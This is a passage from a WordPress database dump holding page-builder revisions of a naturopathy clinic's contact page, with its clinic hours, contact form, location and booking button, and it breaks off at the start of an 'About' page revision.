locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9:30am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2025-04-01 20:43:27','2025-04-01 12:43:27','',26,'https://verdenaturopathy.com.au/?p=448',0,'revision','',0),(451,1,'2025-04-01 20:46:55','2025-04-01 12:46:55','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"168px\" custom_margin=\"||60px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"1090px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1 style=\"text-align: left;\"><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch.</span></h1>\n<p><span style=\"color: #000000; font-family: \'Playfair Display\';\"></span></p>\n<h4 style=\"text-align: left;\"><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Email us at <a href=\"mailto:hello@verde\">hello@verde</a>naturopathy.com.au or feel free to use the contact form below.</span></span></h4>\n<p><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></p>\n<p><span style=\"color: #000000; font-family: \'Playfair Display\';\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" min_height=\"723px\" custom_padding=\"0px|||||\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" width=\"80.2%\" min_height=\"708px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px|0px|||false|false\"][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_contact_form captcha=\"off\" email=\"hello@verdenaturopathy.com.au\" custom_message=\"Name: %%name%%||et_pb_line_break_holder||Email: %%email%%||et_pb_line_break_holder||Message: %%message%%\" success_message=\"Thanks for contacting us. We will be in touch soon.\" submit_button_text=\"Submit\" _builder_version=\"4.9.4\" form_field_background_color=\"#FFFFFF\" form_field_text_color=\"#000000\" form_field_custom_margin=\"||30px||false|false\" form_field_font=\"Montserrat||||||||\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#FFFFFF\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"2px\" border_color_all=\"#000000\" global_colors_info=\"{%22gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761%22:%91%93}\" form_field_background_color__hover_enabled=\"on|desktop\"][et_pb_contact_field field_id=\"name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" width=\"95.7%\" custom_margin=\"||17px|-30px||\" custom_padding=\"0px|||0px||\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"color: #000000; font-family: \'Playfair Display\'; font-size: x-large;\">Clinic hours</span></h3>\n<h3></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Tues/Wed: 9:30am-5:30pm<br /></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Thurs: 10am-7pm</span><br /><span style=\"font-family: Montserrat; color: #666666;\">Sat: 9:30am-1pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Online consults available. Please get in touch if the above days/times are unsuitable.</span></span></h3>\n<p><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\">Clinic location</span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking). </span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9:30am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2025-04-01 20:46:55','2025-04-01 12:46:55','',26,'https://verdenaturopathy.com.au/?p=451',0,'revision','',0),(450,1,'2025-04-01 20:46:00','2025-04-01 12:46:00','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"168px\" custom_margin=\"||60px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"1090px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1 style=\"text-align: left;\"><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch.</span></h1>\n<p><span style=\"color: #000000; font-family: \'Playfair Display\';\"></span></p>\n<h4 style=\"text-align: left;\"><span style=\"font-family: Montserrat; font-size: x-large;\"><span style=\"font-family: Montserrat; color: #666666;\">Email us at <a href=\"mailto:hello@verde\">hello@verde</a>naturopathy.com.au or feel free to use the contact form below.</span></span></h4>\n<p><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></p>\n<p><span style=\"color: #000000; font-family: \'Playfair Display\';\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" min_height=\"723px\" custom_padding=\"0px|||||\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" width=\"80.2%\" min_height=\"708px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px|0px|||false|false\"][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_contact_form captcha=\"off\" email=\"hello@verdenaturopathy.com.au\" custom_message=\"Name: %%name%%||et_pb_line_break_holder||Email: %%email%%||et_pb_line_break_holder||Message: %%message%%\" success_message=\"Thanks for contacting us. We will be in touch soon.\" submit_button_text=\"Submit\" _builder_version=\"4.9.4\" form_field_background_color=\"#FFFFFF\" form_field_text_color=\"#000000\" form_field_custom_margin=\"||30px||false|false\" form_field_font=\"Montserrat||||||||\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#FFFFFF\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"2px\" border_color_all=\"#000000\" global_colors_info=\"{%22gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761%22:%91%93}\" form_field_background_color__hover_enabled=\"on|desktop\"][et_pb_contact_field field_id=\"name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" width=\"95.7%\" custom_margin=\"||17px|-30px||\" custom_padding=\"0px|||0px||\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"color: #000000; font-family: \'Playfair Display\'; font-size: x-large;\">Clinic hours</span></h3>\n<h3></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Tues/Wed: 9:30am-5:30pm<br /></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Thurs: 10am-7pm</span><br /><span style=\"font-family: Montserrat; color: #666666;\">Sat: 9:30am-1pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Online consults available. Please get in touch if the above days/times are unsuitable.</span></span></h3>\n<p><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\">Clinic location</span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking). </span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9:30am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2025-04-01 20:46:00','2025-04-01 12:46:00','',26,'https://verdenaturopathy.com.au/?p=450',0,'revision','',0),(465,1,'2025-04-09 21:16:34','2025-04-09 13:16:34','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Meet Mel.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Mel is a mother, tea lover, avid 